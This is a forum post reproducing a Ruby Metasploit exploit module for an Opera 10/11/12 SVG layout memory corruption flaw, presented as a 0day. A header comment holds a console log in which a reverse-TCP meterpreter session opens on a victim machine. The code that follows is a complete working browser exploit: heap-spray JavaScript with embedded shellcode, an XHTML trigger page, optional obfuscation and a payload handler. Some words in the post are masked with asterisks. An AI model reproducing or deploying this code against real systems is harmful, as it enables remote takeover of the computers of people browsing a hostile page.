Kod:
[COLOR=#008200]############################################################################################################### [/COLOR]
[COLOR=#008200]# Exploit for Opera Browser 10/11/12 (SVG layout) Memory Corruption (0day) [/COLOR]
[COLOR=#008200]# [/COLOR]
[COLOR=#008200]# Vulnerability: [/COLOR]
[COLOR=#008200]# [/COLOR]
[COLOR=#008200]# Discovered: 2010-10-13 [/COLOR]
[COLOR=#008200]# Patched: 0day [/COLOR]
[COLOR=#008200]# Tested on: v10.xx (v10.50, v10.51, v10.52, v10.53, v10.54, v10.6, v10.61, v10.62 and v10.63) [/COLOR]
[COLOR=#008200]# v11.xx (v11.00, v11.01, v11.10, v11.11, v11.50 and v11.51) [/COLOR]
[COLOR=#008200]# [/COLOR]
[COLOR=#008200]# Exploit: [/COLOR]
[COLOR=#008200]# [/COLOR]
[COLOR=#008200]# Coded: 2010-10-14 [/COLOR]
[COLOR=#008200]# Last revision: 2011-10-08 [/COLOR]
[COLOR=#008200]# [/COLOR]
[COLOR=#008200]# This exploit was modified with a new poc and triggering method, to hit Opera Next. The first copy was coded for v10.5x/v10.6x. [/COLOR]
[COLOR=#008200]# [/COLOR]
[COLOR=#008200]# RCE on: v11.00, v11.01, v11.10, v11.11, v11.50, v11.51 and v12.00 pre-alpha r1076 (Opera Next) [/COLOR]
[COLOR=#008200]# [/COLOR]
[COLOR=#008200]# Notes: [/COLOR]
[COLOR=#008200]# [/COLOR]
[COLOR=#008200]# 1) DEP bypass: possible but unreliable. [/COLOR]
[COLOR=#008200]# 2) Let me know if you improve this one ;) [/COLOR]
[COLOR=#008200]# 3) Two days ago, Opera Next was updated to 12.00 pre-alpha r1085 [/COLOR]
[COLOR=#008200]# and this exploit is less reliable, even sometimes never gets crashed. [/COLOR]
[COLOR=#008200]# Anyway, I've also seen remote code execution. [/COLOR]
[COLOR=#008200]# [/COLOR]
[COLOR=#008200]# [/COLOR]
[COLOR=#008200]# Credits: Jose A. Vazquez of http://spa-s3c.blogspot.com [/COLOR]
[COLOR=#008200]# [/COLOR]
[COLOR=#008200]# Greets to: Ruben, Sinn3r, ****sploit Team, Corelan Team, EnRed20.org, etc [/COLOR]
[COLOR=#008200]# [/COLOR]
[COLOR=#008200]# [/COLOR]
[COLOR=#008200]# Running against Opera v12.00 pre-alpha r1076... [/COLOR]
[COLOR=#008200]# [/COLOR]
[COLOR=#008200]# [/COLOR]
[COLOR=#008200]# [/COLOR]
[COLOR=#008200]# =[ ****sploit v4.0.1-dev [core:4.0 api:1.0] [/COLOR]
[COLOR=#008200]# + -- --=[ 742 exploits - 378 auxiliary - 83 post [/COLOR]
[COLOR=#008200]# + -- --=[ 228 payloads - 27 encoders - 8 nops [/COLOR]
[COLOR=#008200]# =[ svn r13810 updated today (2011.10.06) [/COLOR]
[COLOR=#008200]# [/COLOR]
[COLOR=#008200]# msf > use windows/browser/opera_svg_0day [/COLOR]
[COLOR=#008200]# msf exploit(opera_svg_0day) > set payload windows/meterpreter/reverse_tcp [/COLOR]
[COLOR=#008200]# payload => windows/meterpreter/reverse_tcp [/COLOR]
[COLOR=#008200]# msf exploit(opera_svg_0day) > set LHOST 192.168.1.103 [/COLOR]
[COLOR=#008200]# LHOST => 192.168.1.103 [/COLOR]
[COLOR=#008200]# msf exploit(opera_svg_0day) > exploit [/COLOR]
[COLOR=#008200]#
[*] Exploit running as background job. [/COLOR]
[COLOR=#008200]# msf exploit(opera_svg_0day) > [/COLOR]
[COLOR=#008200]#
[*] Started reverse handler on 192.168.1.103:4444 [/COLOR]
[COLOR=#008200]#
[*] Using URL: http://0.0.0.0:8080/dpIDdyCpEoqCa5 [/COLOR]
[COLOR=#008200]#
[*] Local IP: http://192.168.1.103:8080/dpIDdyCpEoqCa5 [/COLOR]
[COLOR=#008200]#
[*] Server started. [/COLOR]
[COLOR=#008200]#
[*] Sending Opera Browser 10/11/12 (SVG layout) Memory Corruption to 192.168.1.104:1233 (Method: usual / Target: Opera Browser (v11.xx - v12.00pre-alpha) / Windows XP SP3 (DEP-off)) [/COLOR]
[COLOR=#008200]#
[*] Sending stage 1 (Spraying the heap) [/COLOR]
[COLOR=#008200]#
[*] Sending stage 2 (Triggering the vulnerability) [/COLOR]
[COLOR=#008200]#
[*] Sending Opera Browser 10/11/12 (SVG layout) Memory Corruption to 192.168.1.104:1233 (Method: usual / Target: Opera Browser (v11.xx - v12.00pre-alpha) / Windows XP SP3 (DEP-off)) [/COLOR]
[COLOR=#008200]#
[*] Sending stage (752128 bytes) to 192.168.1.104 [/COLOR]
[COLOR=#008200]#
[*] Sending stage 1 (Spraying the heap) [/COLOR]
[COLOR=#008200]#
[*] Meterpreter session 2 opened (192.168.1.103:4444 -> 192.168.1.104:1234) at 2011-10-08 22:32:31 +0200 [/COLOR]
[COLOR=#008200]# Interrupt: use the 'exit' command to quit [/COLOR]
[COLOR=#008200]# msf exploit(opera_svg_0day) > sessions [/COLOR]
[COLOR=#008200]# [/COLOR]
[COLOR=#008200]# Active sessions [/COLOR]
[COLOR=#008200]# =============== [/COLOR]
[COLOR=#008200]# [/COLOR]
[COLOR=#008200]# Id Type Information Connection [/COLOR]
[COLOR=#008200]# -- ---- ----------- ---------- [/COLOR]
[COLOR=#008200]# 1 meterpreter x86/win32 0XDE1-A39ED4C12\0xde1 @ 0XDE1-A39ED4C12 192.168.1.103:4444 -> 192.168.1.104:1234 [/COLOR]
[COLOR=#008200]# [/COLOR]
[COLOR=#008200]# msf exploit(opera_svg_0day) > sessions -i 1 [/COLOR]
[COLOR=#008200]#
[*] Starting interaction with 1... [/COLOR]
[COLOR=#008200]# [/COLOR]
[COLOR=#008200]# meterpreter > execute -f calc.exe [/COLOR]
[COLOR=#008200]# Process 1752 created. [/COLOR]
[COLOR=#008200]# meterpreter > exit [/COLOR]
[COLOR=#008200]#
[*] Shutting down Meterpreter... [/COLOR]
[COLOR=#008200]# [/COLOR]
[COLOR=#008200]#
[*] Meterpreter session 1 closed. Reason: User exit [/COLOR]
[COLOR=#008200]# msf exploit(opera_svg_0day) > [/COLOR]
[COLOR=#008200]# [/COLOR]
[COLOR=#008200]################################################################################################################ [/COLOR]
require [COLOR=#0000ff]'msf/core'[/COLOR]
[B][COLOR=#006699]class[/COLOR][/B] ****sploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::[COLOR=#0066cc]HTML[/COLOR]
[B][COLOR=#006699]def[/COLOR][/B] initialize(info = {})
[B][COLOR=#006699]super[/COLOR][/B](update_info(info,
[COLOR=#0000ff]'Name'[/COLOR] => [COLOR=#0000ff]'Opera Browser 10/11/12 (SVG layout) Memory Corruption'[/COLOR],
[COLOR=#0000ff]'Description'[/COLOR] => %q{
This [B][COLOR=#006699]module[/COLOR][/B] exploits a vulnerability [B][COLOR=#006699]in[/COLOR][/B] the bad nesting with [COLOR=#0066cc]SVG[/COLOR] tags. Successfully exploiting
leads to remote code execution [B][COLOR=#006699]or[/COLOR][/B] denial of service condition under Windows [COLOR=#0066cc]XP[/COLOR] [COLOR=#0066cc]SP3[/COLOR] ([COLOR=#0066cc]DEP[/COLOR] = off).
Best results of reliability using Opera v12.[COLOR=#0066cc]00[/COLOR] pre-alpha r1076 whereas that v11.xx will have less
success (depending of opera.dll version). This [B][COLOR=#006699]module[/COLOR][/B] won't work against v10.xx because it was
modified to exploit Opera upper to v11.
Read the lastest references [B][COLOR=#006699]for[/COLOR][/B] further details.
},
[COLOR=#0000ff]'License'[/COLOR] => [COLOR=#0066cc]MSF_LICENSE[/COLOR],
[COLOR=#0000ff]'Author'[/COLOR] =>
[
[COLOR=#0000ff]'Jose A. Vazquez'[/COLOR]
],
[COLOR=#0000ff]'Version'[/COLOR] => [COLOR=#0000ff]'$Revision: 0011 $'[/COLOR],
[COLOR=#0000ff]'References'[/COLOR] =>
[
[[COLOR=#0000ff]'URL'[/COLOR], [COLOR=#0000ff]'http://www.beyondsecurity.com/ssd.html'[/COLOR]],
[[COLOR=#0000ff]'URL'[/COLOR], [COLOR=#0000ff]'http://spa-s3c.blogspot.com/2011/10/spas3c-sv-006opera-browser-101112-0-day.html'[/COLOR]], [COLOR=#008200]# English [/COLOR]
[[COLOR=#0000ff]'URL'[/COLOR], [COLOR=#0000ff]'http://enred20.org/node/27'[/COLOR]] [COLOR=#008200]# Spanish [/COLOR]
],
[COLOR=#0000ff]'DefaultOptions'[/COLOR] =>
{
[COLOR=#0000ff]'EXITFUNC'[/COLOR] => [COLOR=#0000ff]'process'[/COLOR],
[COLOR=#0000ff]'HTTP::compression'[/COLOR] => [COLOR=#0000ff]'gzip'[/COLOR],
[COLOR=#0000ff]'HTTP::chunked'[/COLOR] => [B][COLOR=#006699]true[/COLOR][/B]
},
[COLOR=#0000ff]'Payload'[/COLOR] =>
{
[COLOR=#0000ff]'Space'[/COLOR] => [COLOR=#0066cc]1000[/COLOR],
[COLOR=#0000ff]'BadChars'[/COLOR] => [COLOR=#0000ff]"\x00"[/COLOR],
[COLOR=#0000ff]'Compat'[/COLOR] =>
{
[COLOR=#0000ff]'ConnectionType'[/COLOR] => [COLOR=#0000ff]'-find'[/COLOR],
},
[COLOR=#0000ff]'StackAdjustment'[/COLOR] => -[COLOR=#0066cc]3500[/COLOR]
},
[COLOR=#0000ff]'Platform'[/COLOR] => [COLOR=#0000ff]'win'[/COLOR],
[COLOR=#0000ff]'Targets'[/COLOR] =>
[
[COLOR=#008200]# spray of ~ 450 MB. [/COLOR]
[ [COLOR=#0000ff]'Opera Browser (v11.xx - v12.00pre-alpha) / Windows XP SP3 (DEP-off)'[/COLOR],
{
[COLOR=#0000ff]'Method'[/COLOR] => [COLOR=#0000ff]'usual'[/COLOR],
[COLOR=#0000ff]'MaxOffset'[/COLOR] => [B][COLOR=#006699]nil[/COLOR][/B],
[COLOR=#0000ff]'MaxSize'[/COLOR] => [B][COLOR=#006699]nil[/COLOR][/B],
[COLOR=#0000ff]'MaxBlocks'[/COLOR] => [COLOR=#0066cc]900[/COLOR],
[COLOR=#0000ff]'Ret'[/COLOR] => 0x0c0c0c0c
}
],
[COLOR=#008200]# Thanks to sinn3r of ****sploit.com for this method. [/COLOR]
[ [COLOR=#0000ff]'Opera Browser (v11.xx) / Windows XP SP3 (DEP-off)'[/COLOR],
{
[COLOR=#0000ff]'Method'[/COLOR] => [COLOR=#0000ff]'precise-al********-size'[/COLOR],
[COLOR=#0000ff]'MaxOffset'[/COLOR] => 0x800,
[COLOR=#0000ff]'MaxSize'[/COLOR] => 0x80000,
[COLOR=#0000ff]'MaxBlocks'[/COLOR] => 0x500,
[COLOR=#0000ff]'Ret'[/COLOR] => 0x0c0c0c0c
}
]
],
[COLOR=#0000ff]'DisclosureDate'[/COLOR] => [COLOR=#0000ff]'0day'[/COLOR],
[COLOR=#0000ff]'DefaultTarget'[/COLOR] => [COLOR=#0066cc]0[/COLOR]))
[COLOR=#008200]#Apply obfuscation by default [/COLOR]
register_options(
[
OptBool.[B][COLOR=#006699]new[/COLOR][/B]([COLOR=#0000ff]'OBFUSCATE'[/COLOR], [[B][COLOR=#006699]false[/COLOR][/B], [COLOR=#0000ff]'JavaScript obfuscation'[/COLOR], [B][COLOR=#006699]true[/COLOR][/B]])
], [B][COLOR=#006699]self[/COLOR][/B].[B][COLOR=#006699]class[/COLOR][/B])
[B][COLOR=#006699]end[/COLOR][/B]
[B][COLOR=#006699]def[/COLOR][/B] on_request_uri(cli, request)
mytarget = target
[B][COLOR=#006699]if[/COLOR][/B](request.uri =~ /\.xhtml$/)
[COLOR=#008200]#Send file for trigger the vulnerability [/COLOR]
html = %[COLOR=#0066cc]Q[/COLOR]|
<html xmlns=[COLOR=#0000ff]"http://www.w3.org/1999/xhtml"[/COLOR] xmlns[COLOR=#ff1493]:svt[/COLOR]=[COLOR=#0000ff]"http://www.w3.org/2000/svg"[/COLOR]>
<head>
<**** http-equiv=[COLOR=#0000ff]"*******"[/COLOR] content=[COLOR=#0000ff]"0;url="[/COLOR] />
</head>
<select1 style = [COLOR=#0000ff]'padding-bottom: 8711px;background-image: url("HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH");'[/COLOR] >
<svt[COLOR=#ff1493]:svg[/COLOR]>
<svt[COLOR=#ff1493]:title[/COLOR] style = [COLOR=#0000ff]'pointer-events: visiblePainted;font: normal small-caps 120%/120% fantasy;'[/COLOR] >
<svt[COLOR=#ff1493]:svg[/COLOR]>
<svt[COLOR=#ff1493]:font[/COLOR]>
<svt[COLOR=#ff1493]:animateMotion[/COLOR]>
feFuncR
</svt[COLOR=#ff1493]:animateMotion[/COLOR]>
</svt[COLOR=#ff1493]:font[/COLOR]>
</svt[COLOR=#ff1493]:svg[/COLOR]>
</svt[COLOR=#ff1493]:title[/COLOR]>
</svt[COLOR=#ff1493]:svg[/COLOR]>
</select1>
</html>
|
[COLOR=#008200]#Send triggerer [/COLOR]
print_status([COLOR=#0000ff]"Sending stage 2 (Triggering the vulnerability)"[/COLOR])
var_contentype = [COLOR=#0000ff]'application/xhtml+xml'[/COLOR]
[B][COLOR=#006699]else[/COLOR][/B]
[COLOR=#008200]#Sending init HTML [/COLOR]
print_status([COLOR=#0000ff]"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport} (Method: #{mytarget['Method']} / Target: #{mytarget.name})"[/COLOR])
[B][COLOR=#006699]return[/COLOR][/B] [B][COLOR=#006699]if[/COLOR][/B] ((p = regenerate_payload(cli)) == [B][COLOR=#006699]nil[/COLOR][/B])
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(mytarget.arch))
addr_word = [mytarget.ret].pack([COLOR=#0000ff]'V'[/COLOR]).unpack([COLOR=#0000ff]'H*'[/COLOR])[[COLOR=#0066cc]0[/COLOR]][[COLOR=#0066cc]0[/COLOR],[COLOR=#0066cc]4[/COLOR]]
var_timer_trigger = (rand([COLOR=#0066cc]3[/COLOR]) + [COLOR=#0066cc]2[/COLOR]) * [COLOR=#0066cc]1000[/COLOR]
var_file_trigger = rand_text_alpha(rand([COLOR=#0066cc]30[/COLOR])+[COLOR=#0066cc]2[/COLOR])
[COLOR=#008200]#Build the exploit [/COLOR]
var_url = ((datastore[[COLOR=#0000ff]'SSL'[/COLOR]]) ? [COLOR=#0000ff]"https://"[/COLOR] : [COLOR=#0000ff]"http://"[/COLOR])
var_url << ((datastore[[COLOR=#0000ff]'SRVHOST'[/COLOR]] == [COLOR=#0000ff]'0.0.0.0'[/COLOR]) ? Rex::Socket.source_address(cli.peerhost) : datastore[[COLOR=#0000ff]'SRVHOST'[/COLOR]])
var_url << [COLOR=#0000ff]":"[/COLOR] + datastore[[COLOR=#0000ff]'SRVPORT'[/COLOR]]
var_url << get_resource
[COLOR=#008200]#Choose the heap spray method [/COLOR]
[B][COLOR=#006699]if[/COLOR][/B](mytarget[[COLOR=#0000ff]'Method'[/COLOR]] == [COLOR=#0000ff]'usual'[/COLOR])
spray_js = <<-[COLOR=#0066cc]JS[/COLOR]
var shell = unescape([COLOR=#0000ff]"#{shellcode}"[/COLOR]);
var size = shell.length * [COLOR=#0066cc]2[/COLOR];
var nopsize = 0x100000 - (size + 0x14);
var nopsled = unescape([COLOR=#0000ff]"%u#{addr_word}"[/COLOR]);
[B][COLOR=#006699]while[/COLOR][/B](nopsled.length * [COLOR=#0066cc]2[/COLOR] < nopsize) {
nopsled += nopsled;
}
var blocks = [B][COLOR=#006699]new[/COLOR][/B] [COLOR=#808080]Array[/COLOR]();
[B][COLOR=#006699]for[/COLOR][/B] (var x = [COLOR=#0066cc]0[/COLOR]; x < [COLOR=#008200]#{mytarget['MaxBlocks']}; x++) { [/COLOR]
blocks[x] = nopsled + shell;
}
function TriggerVuln(){
********.write([COLOR=#0000ff]"<iframe src='#{var_url}/#{var_file_trigger}.xhtml'></iframe>"[/COLOR]);
}
[COLOR=#0066cc]JS[/COLOR]
[B][COLOR=#006699]else[/COLOR][/B]
[COLOR=#008200]# [/COLOR]
[COLOR=#008200]# Tested on Opera v11.5x but it's not working on Opera v12.00 pre-alpha [/COLOR]
[COLOR=#008200]# [/COLOR]
[COLOR=#008200]# /* [/COLOR]
[COLOR=#008200]# * Heap spray for Opera that uses VirtualAlloc [/COLOR]
[COLOR=#008200]# * Arguments: [/COLOR]
[COLOR=#008200]# * @blocks - an emtpy array [/COLOR]
[COLOR=#008200]# * @code - the payload [/COLOR]
[COLOR=#008200]# * @offset - padding to align the code [/COLOR]
[COLOR=#008200]# * @chunk_max - max size for each al******** [/COLOR]
[COLOR=#008200]# * @blocks_max - max blocks [/COLOR]
[COLOR=#008200]# */ [/COLOR]
[COLOR=#008200]# [/COLOR]
[COLOR=#008200]# [/COLOR]
spray_js = <<-[COLOR=#0066cc]JS[/COLOR]
function heap_spray(blocks, code, offset, chunk_max, blocks_max) {
[B][COLOR=#006699]if[/COLOR][/B] (chunk_max < 0x7F000) {
[B][COLOR=#006699]throw[/COLOR][/B] [COLOR=#0000ff]"This function is meant for size 0x7F000 or higher to trigger VirtualAlloc"[/COLOR];
}
chunk_max /= [COLOR=#0066cc]2[/COLOR];
var nops = unescape([COLOR=#0000ff]"%u0c0c%u0c0c"[/COLOR]);
[B][COLOR=#006699]while[/COLOR][/B] (nops.length < chunk_max) nops += nops;
var offset_chunk = nops.substr([COLOR=#0066cc]0[/COLOR], offset-code.length);
var block = offset_chunk + code + nops.substr([COLOR=#0066cc]0[/COLOR], chunk_max-offset_chunk.length-code.length);
[B][COLOR=#006699]while[/COLOR][/B] (block.length % [COLOR=#0066cc]8[/COLOR] != [COLOR=#0066cc]0[/COLOR]) block += unescape([COLOR=#0000ff]"%u0c"[/COLOR]);
var shellcode = block.substr([COLOR=#0066cc]0[/COLOR], (chunk_max-0x1c)/[COLOR=#0066cc]2[/COLOR]);
[B][COLOR=#006699]for[/COLOR][/B] (var i=[COLOR=#0066cc]0[/COLOR]; i < blocks_max; i++) {
blocks[i] = shellcode + unescape([COLOR=#0000ff]"%u0c0c"[/COLOR]);
}
}
var blocks = [B][COLOR=#006699]new[/COLOR][/B] [COLOR=#808080]Array[/COLOR]();
var code = unescape([COLOR=#0000ff]"#{shellcode}"[/COLOR]);
heap_spray(blocks, code, [COLOR=#008200]#{mytarget['MaxOffset']}, #{mytarget['MaxSize']}, #{mytarget['MaxBlocks']}); [/COLOR]
function TriggerVuln(){
********.write([COLOR=#0000ff]"<iframe src='#{var_url}/#{var_file_trigger}.xhtml'></iframe>"[/COLOR]);
}
[COLOR=#0066cc]JS[/COLOR]
[B][COLOR=#006699]end[/COLOR][/B]
[B][COLOR=#006699]if[/COLOR][/B] datastore[[COLOR=#0000ff]'OBFUSCATE'[/COLOR]] == [B][COLOR=#006699]true[/COLOR][/B]
spray_js = ::Rex::Exploitation::JSObfu.[B][COLOR=#006699]new[/COLOR][/B](spray_js)
spray_js.obfuscate
trigger_sym = spray_js.sym([COLOR=#0000ff]'TriggerVuln'[/COLOR])
spray_js = spray_js.to_s + [COLOR=#0000ff]"setTimeout('#{trigger_sym}()',#{var_timer_trigger});"[/COLOR]
[B][COLOR=#006699]else[/COLOR][/B]
spray_js = spray_js.to_s + [COLOR=#0000ff]"setTimeout('TriggerVuln()',#{var_timer_trigger});"[/COLOR]
[B][COLOR=#006699]end[/COLOR][/B]
html = %[COLOR=#0066cc]Q[/COLOR]|
<html>
<head>
<script type=[COLOR=#0000ff]"text/javascript"[/COLOR]>
[COLOR=#008200]#{spray_js} [/COLOR]
</script>
</head>
<html>
|
print_status([COLOR=#0000ff]"Sending stage 1 (Spraying the heap)"[/COLOR])
var_contentype = [COLOR=#0000ff]'text/html'[/COLOR]
[B][COLOR=#006699]end[/COLOR][/B]
[COLOR=#008200]#Response [/COLOR]
send_response(cli, html, { [COLOR=#0000ff]'Content-Type'[/COLOR] => var_contentype, [COLOR=#0000ff]'Pragma'[/COLOR] => [COLOR=#0000ff]'no-cache'[/COLOR] })
[COLOR=#008200]#Handle the payload [/COLOR]
handler(cli)
[B][COLOR=#006699]end[/COLOR][/B]
[B][COLOR=#006699]end[/COLOR][/B]
